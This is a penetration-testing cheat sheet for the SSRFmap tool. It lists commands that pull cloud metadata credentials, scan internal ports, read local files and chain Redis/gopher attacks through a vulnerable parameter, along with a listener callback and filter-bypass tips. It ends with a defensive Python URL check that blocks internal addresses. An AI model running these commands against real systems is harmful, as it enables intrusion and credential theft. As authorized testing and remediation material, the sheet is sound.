SSRFmap Cheat Sheet
SSRF exploitation framework with modules for cloud metadata, port scan, and shell.
Overview
SSRFmap automates Server-Side Request Forgery testing: identifies injectable parameters, probes internal services, and runs modules (AWS/GCP metadata, Redis, port scan) on authorized targets.
Authorized testing only. Use only on systems, networks, and accounts you own or have explicit written permission to test. Unauthorized access is illegal.
Install
git clone https://github.com/swisskyrepo/SSRFmap.git
cd SSRFmap && pip install -r requirements.txt
Essential commands
Basic SSRF on URL parameter
python ssrfmap.py -r request.txt -p url
Request file from Burp + parameter name
python ssrfmap.py -r request.txt -p dest
Common workflows
AWS metadata (IMDS)
python ssrfmap.py -r request.txt -p url -m aws
Internal port scan via SSRF
python ssrfmap.py -r request.txt -p url -m portscan
python ssrfmap.py -r request.txt -p url -m portscan --ports 22,80,443,6379,8080
Read local files (when supported)
python ssrfmap.py -r request.txt -p url -m readfiles
Redis / gopher chains (advanced, in-scope only)
python ssrfmap.py -r request.txt -p url -m redis
Point parameter to your listener
python ssrfmap.py -r request.txt -p url --lhost 10.10.14.5 --lport 8000
Flags reference
| Flag | Description |
|---|---|
| -r FILE | HTTP request file (Burp export) |
| -p PARAM | Vulnerable parameter |
| -m MODULE | Module (aws, portscan, readfiles, redis, etc.) |
| --lhost | Listener / callback host |
| --lport | Listener port |
| --uagent | Custom User-Agent |
| --ssl | Force HTTPS |
| --level | Crawl / test level (if supported) |
Tips
- Save raw request from Burp where server fetches a URL you control (url, uri, path, dest).
- Test http://127.0.0.1, http://169.254.169.254, and internal hostnames; encoding bypasses often needed (@, DNS rebinding).
- Cloud: check IMDSv2 token requirement before -m aws.
- Pair with Burp Collaborator or interactsh for blind SSRF confirmation.
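For the remediation side of a finding, the destination check below refuses the targets named in the tips (loopback, the 169.254.169.254 metadata address, internal hosts, `@` userinfo tricks, non-HTTP schemes) and returns the resolved addresses so the fetcher can pin them against DNS rebinding. It is an added example, not part of SSRFmap; `check_fetch_target` and `system_resolver` are hypothetical names, and the URLs in it are constructed samples.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}  # gopher://, file://, dict:// are refused

def system_resolver(host, port):
    """Resolve host to a list of IP strings using the OS resolver."""
    infos = socket.getaddrinfo(host, port, proto=socket.IPPROTO_TCP)
    return [info[4][0] for info in infos]

def check_fetch_target(url, resolver=system_resolver):
    """Return (ok, reason, pinned_ips) for a user-supplied URL.

    On success the caller must connect to one of pinned_ips instead of
    resolving the name again; a second lookup is what DNS rebinding abuses.
    """
    try:
        parts = urlsplit(url)
        scheme = parts.scheme.lower()
        host = parts.hostname  # text after any "user@" prefix, brackets removed
        port = parts.port or (443 if scheme == "https" else 80)
    except ValueError:
        return False, "malformed URL", []
    if scheme not in ALLOWED_SCHEMES:
        return False, "scheme not allowed", []
    if not host:
        return False, "no host", []
    try:
        addrs = resolver(host, port)
    except OSError:
        return False, "resolution failed", []
    if not addrs:
        return False, "resolution failed", []
    for addr in addrs:
        ip = ipaddress.ip_address(addr.split("%")[0])  # drop IPv6 zone id
        if ip.version == 6 and ip.ipv4_mapped:
            ip = ip.ipv4_mapped  # ::ffff:127.0.0.1 is still loopback
        # is_global is False for loopback, RFC 1918, link-local (IMDS), CGNAT
        if not ip.is_global:
            return False, f"non-public address {ip}", []
    return True, "ok", list(addrs)

if __name__ == "__main__":
    for u in ("http://169.254.169.254/latest/meta-data/",
              "http://example.com@127.0.0.1/"):
        print(u, check_fetch_target(u))
```

The check only holds if the HTTP client connects to a pinned address and does not follow redirects without re-running it on each hop.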